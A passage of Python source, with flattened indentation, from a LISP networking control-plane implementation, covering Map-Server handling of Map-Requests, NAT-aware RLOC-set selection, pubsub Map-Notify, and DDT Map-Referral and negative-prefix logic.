rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
    #endfor
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
    # Check the case where an ETR included a local RLOC and may be behind
    # the same NAT as the requester. In this case, the requester can encap
    # directly to the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
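#
# Worked example (hypothetical RLOC-set): a site registers an RTR RLOC at
# unicast priority 254 and an ETR RLOC at priority 1. If the Map-Request
# source matches the priority-254 RTR entry, the RTR gets back just the ETR
# RLOCs. If an ITR is requesting, it gets back the site's private RLOCs plus
# the priority-254 RTR entries.
#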
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify message to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription is being requested; return a Map-Notify so the ITR knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
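#
# Worked example (assuming type codes 2 for Map-Reply and 4 for Map-Notify):
# a Map-Reply starting 0x20000001 (one EID-record) becomes a Map-Notify
# starting 0x40000001, followed by the original 8-byte nonce, then 4 zero
# bytes for Key-ID, Alg-ID, and Authentication Data Length, then the
# unchanged EID-records.
#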
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
    # a problem on the RTR, when behind a NAT. An ITR usually
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
    # If the request is for a non-Crypto-EID, signatures are configured to be
    # required, and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
        # We do not want to return a coarser EID-prefix to the Map-Resolver.
        # The accept-more-specifics (AMS) site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, False, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
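#
# Worked example (hypothetical IPv4 addresses): for eid 10.1.1.1 and
# entry_prefix 10.1.0.0, the XOR is 0x00000101 and the first differing bit is
# bit 23 counting 0-based from the most-significant bit, so
# neg_prefix.mask_len is raised to 23 if it was shorter.
#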
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
    # Walk looking for the shortest prefix that does NOT match any configured
    # site EIDs.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
    # Walk looking for the shortest prefix that does NOT match any configured
    # site EIDs.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and TTL to return in the EID-
# record. Temporarily return the requested prefix until
# lisp_ms_compute_neg_prefix() is fully working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group = group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, False,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get the referral-node we sent the Map-Request to last time. We need
# to increment its no-response counter.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Referrals have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
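#
# example_pick_referral_node
#
# A minimal sketch, not called anywhere in this module, of the selection
# logic above: filter to up nodes of best (lowest) priority, then pick
# deterministically by hash so all requesters hashing the same flow choose
# the same referral-node. Plain (priority, updown) tuples stand in for
# lisp_referral_node() instances.
#
def example_pick_referral_node(nodes, hashval):
    up = [n for n in nodes if n[1]]
    if (up == []): return(None)
    best = min([n[0] for n in up])
    best_set = [n for n in up if n[0] == best]
    return(best_set[hashval % len(best_set)])
#enddef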
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on an EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If the caller wants us to use the root versus a best-match lookup. We
# only do this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
